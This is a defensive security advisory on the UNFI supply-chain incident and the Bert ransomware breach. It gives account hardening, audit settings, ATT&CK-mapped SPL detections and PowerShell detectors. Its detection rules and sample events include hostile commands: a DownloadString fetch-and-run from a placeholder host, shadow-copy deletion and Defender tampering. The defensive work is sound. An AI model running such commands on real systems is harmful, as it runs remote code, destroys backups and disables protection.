General 16.06.2025

UNFI & S5 Agency World: Technical Recommendations

Whole Foods faces supply chain disruption after cyber incident at distributor UNFI

Assured’s vCISO suggests:

1. M1018 – User Account Management. Eliminate persistent or overprivileged third-party accounts integrated into supply systems.

  • Disable interactive logon for vendor accounts:
    • GPO Path:
      Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment
      Setting: Deny log on locally
      Value: <org> integration service accounts
  • Automatically expire dormant third-party accounts:
    • net user <org>_sync /expires:06/30/2025

2. M1026 – Privileged Account Management. Harden and contain elevated permissions used by third-party integrations:

  • Constrain logon times for integration accounts:
      • net user <org>_sync /times:M-F,06:00-20:00
  • Limit logon from specific IPs only (via Windows Firewall with Advanced Security):
      • GPO Path:
        Computer Configuration > Windows Settings > Security Settings > Windows Firewall with Advanced Security > Inbound Rules
        Rule: Allow inbound traffic only from <org> IP ranges to port 443 (HTTPS)
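The account constraints in items 1 and 2 can be audited and applied in one pass rather than one `net user` command at a time. The script below is an added example, not part of Assured's advisory; it assumes the integration accounts are local Windows accounts whose names end in `_sync` (the advisory's `<org>_sync` convention) and uses the same expiry date and logon window the advisory gives. Run it without `-Apply` first: it only reports.

```powershell
# Added example (not from the advisory): review local third-party integration
# accounts for items 1 and 2. Assumption: vendor accounts match -VendorPattern.
# Without -Apply the function only reports; with -Apply it sets an expiry on
# accounts that have none, disables accounts dormant for longer than
# -DormantDays, and restricts logon hours exactly as "net user /times" does.
function Invoke-VendorAccountReview {
    [CmdletBinding()]
    param(
        [string]   $VendorPattern = '*_sync',
        [int]      $DormantDays   = 30,
        [datetime] $ExpireOn      = (Get-Date '2025-06-30'),   # date used in item 1
        [string]   $LogonHours    = 'M-F,06:00-20:00',          # window used in item 2
        [switch]   $Apply
    )

    $cutoff = (Get-Date).AddDays(-$DormantDays)

    foreach ($acct in (Get-LocalUser | Where-Object { $_.Name -like $VendorPattern })) {
        # LastLogon is $null for accounts that never logged on; treat those as dormant too.
        $dormant  = (-not $acct.LastLogon) -or ($acct.LastLogon -lt $cutoff)
        $noExpiry = -not $acct.AccountExpires
        $name     = $acct.Name

        if ($Apply) {
            if ($noExpiry) {
                # Equivalent of: net user <org>_sync /expires:06/30/2025
                Set-LocalUser -Name $name -AccountExpires $ExpireOn
            }
            if ($dormant -and $acct.Enabled) {
                Disable-LocalUser -Name $name
            }
            # Set-LocalUser has no logon-hours parameter, so fall back to net user (item 2).
            net user $name "/times:$LogonHours" | Out-Null
        }

        # Report reflects the values read before any change was applied.
        [pscustomobject]@{
            Name           = $name
            Enabled        = $acct.Enabled
            LastLogon      = $acct.LastLogon
            AccountExpires = $acct.AccountExpires
            Dormant        = $dormant
            MissingExpiry  = $noExpiry
        }
    }
}

# Dry run: list vendor accounts and flag those that need action.
Invoke-VendorAccountReview | Format-Table -AutoSize
# Enforce:  Invoke-VendorAccountReview -Apply
```

For domain accounts the same logic applies with `Get-ADUser`/`Set-ADUser -AccountExpirationDate`; the report columns are deliberately the ones a reviewer needs to justify each disable or expiry decision.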

3. M1047 – Audits. Track all actions taken by supply chain-linked service accounts.

  • Enable auditing of service account logon attempts:
      • Intune Settings Catalog:
        Audit Logon Events → Configure "Success" and "Failure"
  • Include command-line in process creation auditing:
      • Intune Settings Catalog:
        Setting: "Include command line in process creation events"
        Value: Enabled

4. M1042 – Disable or Remove Feature or Program. Restrict the ability of compromised third-party accounts to execute arbitrary tools:

  • Set PowerShell policy to “AllSigned”:
      • Intune > Device Configuration Profile > PowerShell Execution Policy
        Value: AllSigned
  • Block command-line tools for third-party accounts via AppLocker:
      • Rule: Deny > User: <org>_sync > Path: C:\Windows\System32\cmd.exe

5. M1038 – Execution Prevention. Prevent script execution from temp directories used in supply chain APIs or tooling:

  • Block scripts from %TEMP% for vendor accounts:
        • Intune > Device Configuration Profile > PowerShell Execution Policy
          Value: AllSigned
  • Disable Office macros for shared Excel-based integration:
        • Registry:
          [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security]
          "VBAWarnings"=dword:00000004

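Items 3 to 5 are pushed from Intune or the registry, but it is worth verifying on a host that the policy actually landed. The check below is an added example, not part of the advisory; it is read-only, uses the standard Windows and Office registry locations for these settings, and treats the advisory's values (Success and Failure auditing, command line in event 4688, `AllSigned`, `VBAWarnings` = 4) as the expected state. Run it in an elevated session so `auditpol` can read the policy.

```powershell
# Added example (not from the advisory): read-only compliance check for items 3-5.
# Registry paths are the standard Windows/Office locations; expected values are
# the ones the advisory recommends.
function Test-SupplyChainHardening {
    $checks = @()

    # Item 3: logon and process-creation auditing. "auditpol /r" emits CSV, so the
    # "Inclusion Setting" column can be read without parsing free text.
    foreach ($sub in 'Logon', 'Process Creation') {
        $row = auditpol /get /subcategory:"$sub" /r | ConvertFrom-Csv
        $checks += [pscustomobject]@{
            Check    = "Audit $sub"
            Expected = 'Success and Failure'
            Observed = $row.'Inclusion Setting'
            Pass     = ($row.'Inclusion Setting' -eq 'Success and Failure')
        }
    }

    # Item 3: "Include command line in process creation events"
    $auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    $cmdLine  = (Get-ItemProperty -Path $auditKey -Name ProcessCreationIncludeCmdLine_Enabled `
                     -ErrorAction SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled
    $checks += [pscustomobject]@{
        Check = 'Command line in 4688'; Expected = 1; Observed = $cmdLine; Pass = ($cmdLine -eq 1)
    }

    # Items 4 and 5: effective PowerShell execution policy (an Intune/GPO value
    # shows up in the MachinePolicy scope and wins over local settings).
    $policy = "$(Get-ExecutionPolicy)"
    $checks += [pscustomobject]@{
        Check = 'PowerShell execution policy'; Expected = 'AllSigned'; Observed = $policy; Pass = ($policy -eq 'AllSigned')
    }

    # Item 5: Excel VBAWarnings. The advisory writes the user hive directly; a
    # GPO/Intune-managed value lives under Software\Policies, so accept either.
    $vba = $null
    foreach ($k in 'HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security',
                   'HKCU:\Software\Microsoft\Office\16.0\Excel\Security') {
        $v = (Get-ItemProperty -Path $k -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
        if ($null -ne $v) { $vba = $v; break }
    }
    $checks += [pscustomobject]@{
        Check = 'Excel VBAWarnings'; Expected = 4; Observed = $vba; Pass = ($vba -eq 4)
    }

    $checks
}

Test-SupplyChainHardening | Format-Table -AutoSize
```

On non-English Windows builds `auditpol` localises the "Success and Failure" string, so adjust the expected value accordingly; the registry and execution-policy checks are language-independent.
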
6. M1032 – Multi-factor Authentication. Protect integration dashboards and portals exposed to UNFI teams:

  • Enforce MFA for all vendor identities:
        • Conditional Access Policy:
          Assign to: Group “UNFI_Accounts”
          Control: Require MFA
  • Block legacy auth methods (POP, IMAP, etc):
        • Conditional Access → Client App Conditions → Block legacy authentication clients


S5 (Port) Agency World: Ransomware Breach

Assured’s vCISO suggests:

Even though Bert is a new group, we have looked into its TTPs and IOCs so we can provide advice on monitoring and protection measures, some of which are included below. We mapped Bert's TTPs to MITRE ATT&CK and generated this set of tactical guidance to help clients protect themselves from a similar attack.

Each entry gives the ATT&CK technique, what Bert does with it, the control we recommend, and the matching configuration for SIEM, EDR and MDM/hardening.

T1059 – Command and Scripting Interpreter
  Description: Uses PowerShell, cmd, and WScript for execution and payload delivery
  Control: Monitor and block suspicious script execution
  • SIEM (SPL):
      index=windows EventCode=4104 (Message="*Invoke*" OR Message="*DownloadString*" OR Message="*Base64*" OR Message="*FromBase64String*")
  • EDR: ASR rule 3b576869-a4ec-4529-8536-b80a7769e899 to block Office apps from creating child processes
  • MDM: Use AppLocker to block untrusted script interpreters (e.g., PowerShell, WScript, cscript)

T1562.001 – Impair Defenses: Disable or Modify Tools
  Description: Disables AV/EDR with Set-MpPreference, sc stop, or registry edits
  Control: Detect and prevent security tool tampering
  • SIEM (SPL):
      index=windows EventCode=4688 (CommandLine="*Set-MpPreference*" OR CommandLine="*Add-MpPreference*")
  • EDR: Tamper Protection = Enabled; Real-time Protection = On
  • MDM: Compliance policy to require EDR ATP risk = "Low"; enforce EDR Real-time Protection

T1070.004 – Indicator Removal: File Deletion
  Description: Deletes Windows event logs and backups using wevtutil, vssadmin, or bcdedit
  Control: Monitor for use of destructive utilities
  • SIEM (SPL):
      index=windows (Image="*vssadmin.exe*" AND CommandLine="*delete shadows*")
  • EDR: Alert on vssadmin, bcdedit, wevtutil usage via device timeline
  • MDM: Enforce BitLocker, prevent backup deletion through policies

T1486 – Data Encrypted for Impact
  Description: Ransomware payload encrypts data on disk
  Control: Detect encryption behavior; isolate host quickly
  • SIEM: Monitor mass file renames or modifications; high entropy in files
  • EDR: Trigger automatic isolation on ransomware detection
  • MDM/hardening: Trigger auto-remediation or quarantine via EDR ATP risk signal

T1027 – Obfuscated Files or Information
  Description: Base64 and other encoding used to obfuscate scripts
  Control: Detect obfuscation patterns in scripting
  • SIEM: Same query as T1059 above (Base64 indicators)
  • EDR: ASR rule be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 to block script content from email/webmail
  • MDM/hardening: Block unsigned or untrusted scripts via Device Restriction profiles

T1055 – Process Injection
  Description: Injects into legitimate processes to evade detection and escalate privileges
  Control: Monitor for parent-child anomalies
  • SIEM: Flag unusual process chains (e.g., Office → PowerShell)
  • EDR: EDR alerting for LSASS or memory access manipulation
  • ASR rule: d4f940ab-401b-4efc-aadc-ad5f3c50688a to block credential theft from LSASS
  • MDM/hardening: Require EDR onboarding; restrict registry access to LSASS

T1047 – Windows Management Instrumentation (WMI)
  Description: Executes scripts and commands remotely for lateral movement
  Control: Detect non-standard WMI usage
  • SIEM: Flag wmic processes launched by non-admins or scripts
  • EDR: Alert on lateral WMI execution in device timeline
  • MDM/hardening: Control WMI usage via controlled folder access and AppLocker rules

T1547.001 – Registry Run Keys / Startup Folder
  Description: Persistence via Run key or Startup folder
  Control: Monitor registry modifications for persistence
  • SIEM (SPL):
      index=windows (RegistryKey="*\\Run*" OR RegistryKey="*\\RunOnce*")
  • EDR: Alert on new autoruns
  • MDM/hardening: Disable legacy autorun functionality in system settings

T1218 – Signed Binary Proxy Execution
  Description: Uses trusted signed tools like rundll32.exe, regsvr32.exe for evasion
  Control: Monitor use of signed Windows binaries for unusual activity
  • SIEM: Detect use of LOLBins like regsvr32.exe, rundll32.exe outside of baseline
  • EDR: Enable detection for Living-Off-the-Land binaries
  • MDM/hardening: Restrict execution via AppLocker or WDAC policies

T1053.005 – Scheduled Task
  Description: Schedules tasks to maintain persistence or execute payloads
  Control: Detect creation of suspicious scheduled tasks
  • SIEM: Monitor Task Scheduler logs or schtasks command usage
  • EDR: Alert on anomalous scheduled tasks
  • MDM/hardening: Monitor and block via AppLocker and Task Scheduler policy settings

T1036 – Masquerading
  Description: Payloads may imitate trusted processes or have misleading file names
  Control: Detect unusual parent-child process and image path anomalies
  • SIEM: Alert on processes executing from unusual paths (e.g., %AppData%, %Temp%)
  • EDR: Enable warnings for unexpected binary locations
  • MDM/hardening: Block unsigned binaries from user-writable directories
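The four SPL queries above (T1059, T1562.001, T1070.004, T1547.001) can be exercised without a SIEM by expressing them as PowerShell rules and running them over sample events or a single host's logs. This is an added example, not part of the advisory or of any vendor's tooling. The field names mirror the SPL queries: `EventCode` 4104 comes from PowerShell script block logging and 4688 from the Security log, while `Image` and `RegistryKey` are Sysmon fields (events 1 and 13). `-like` is case-insensitive, matching SPL wildcard behaviour. The sample events at the bottom are constructed for illustration.

```powershell
# Added example (not from the advisory): the table's SPL detections as PowerShell
# rules, plus a normaliser so Get-WinEvent records can be fed through them.
$BertRules = @(
    @{ Technique = 'T1059'; Name = 'Suspicious PowerShell script block'
       Test = { param($e)
                $e.EventCode -eq 4104 -and
                ($e.Message -like '*Invoke*' -or $e.Message -like '*DownloadString*' -or
                 $e.Message -like '*Base64*' -or $e.Message -like '*FromBase64String*') } }
    @{ Technique = 'T1562.001'; Name = 'Defender preference tampering'
       Test = { param($e)
                $e.EventCode -eq 4688 -and
                ($e.CommandLine -like '*Set-MpPreference*' -or $e.CommandLine -like '*Add-MpPreference*') } }
    @{ Technique = 'T1070.004'; Name = 'Shadow copy deletion'
       Test = { param($e) $e.Image -like '*vssadmin.exe*' -and $e.CommandLine -like '*delete shadows*' } }
    @{ Technique = 'T1547.001'; Name = 'Run / RunOnce key persistence'
       # SPL escapes the backslash as "\\"; -like treats "\" literally, so one is enough.
       Test = { param($e) $e.RegistryKey -like '*\Run*' -or $e.RegistryKey -like '*\RunOnce*' } }
)

function Find-BertIndicators {
    # Evaluate every rule against each event and emit one hit per matching rule.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        foreach ($rule in $BertRules) {
            if (& $rule.Test $Event) {
                [pscustomobject]@{
                    Technique = $rule.Technique
                    Name      = $rule.Name
                    EventCode = $Event.EventCode
                    Evidence  = (@($Event.CommandLine, $Event.RegistryKey, $Event.Message) |
                                 Where-Object { $_ } | Select-Object -First 1)
                }
            }
        }
    }
}

function ConvertFrom-WinEvent {
    # Normalise Get-WinEvent records (Security 4688, PowerShell 4104, Sysmon 1/13)
    # into the field shape the rules expect by reading labelled lines of Message.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $msg = [string]$Record.Message
        $get = { param($label)
                 if ($msg -match "(?m)^(?:$label):\s*(.+)$") { $Matches[1].Trim() } else { $null } }
        [pscustomobject]@{
            EventCode   = $Record.Id
            Message     = $msg
            CommandLine = & $get 'Process Command Line|CommandLine'
            Image       = & $get 'New Process Name|Image'
            RegistryKey = & $get 'TargetObject'
        }
    }
}

# Constructed sample events: the first four should fire, the last two should not.
$sampleEvents = @(
    [pscustomobject]@{ EventCode = 4104; Message = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")'; CommandLine = $null; Image = $null; RegistryKey = $null }
    [pscustomobject]@{ EventCode = 4688; Message = 'A new process has been created.'; CommandLine = 'powershell.exe -NoProfile -Command "Add-MpPreference ..."'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; RegistryKey = $null }
    [pscustomobject]@{ EventCode = 1;    Message = 'Process Create'; CommandLine = 'vssadmin.exe delete shadows'; Image = 'C:\Windows\System32\vssadmin.exe'; RegistryKey = $null }
    [pscustomobject]@{ EventCode = 13;   Message = 'Registry value set'; CommandLine = $null; Image = 'C:\Users\vendor\AppData\Roaming\update.exe'; RegistryKey = 'HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Run\update' }
    [pscustomobject]@{ EventCode = 4104; Message = 'Get-Process | Sort-Object CPU -Descending'; CommandLine = $null; Image = $null; RegistryKey = $null }
    [pscustomobject]@{ EventCode = 4688; Message = 'A new process has been created.'; CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs'; Image = 'C:\Windows\System32\svchost.exe'; RegistryKey = $null }
)

$sampleEvents | Find-BertIndicators | Format-Table -AutoSize

# Live use on a host (elevated), e.g. the last 500 script block events:
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 |
#       ConvertFrom-WinEvent | Find-BertIndicators
#   Security:  @{ LogName = 'Security'; Id = 4688 }
#   Sysmon:    @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 13 }
```

Running the sample produces four hits, one per technique, and nothing for the two benign events. The T1059 rule is deliberately broad (`*Base64*` also catches `FromBase64String`, and `*Invoke*` matches many legitimate cmdlets), so in production it belongs on a watchlist of script block events to triage rather than a page-out alert; the 4688 and Sysmon rules are narrow enough to alert on directly.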
